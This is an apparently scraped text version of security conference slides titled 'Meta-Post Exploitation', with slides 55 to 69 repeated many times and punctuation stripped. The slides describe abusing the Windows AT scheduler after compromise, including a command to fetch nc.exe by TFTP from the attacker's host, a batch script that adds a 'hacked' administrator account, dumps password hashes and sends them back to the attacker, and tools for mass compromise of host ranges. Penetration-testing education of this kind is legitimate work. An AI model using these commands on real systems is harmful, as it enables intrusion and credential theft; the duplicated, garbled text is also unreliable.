- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
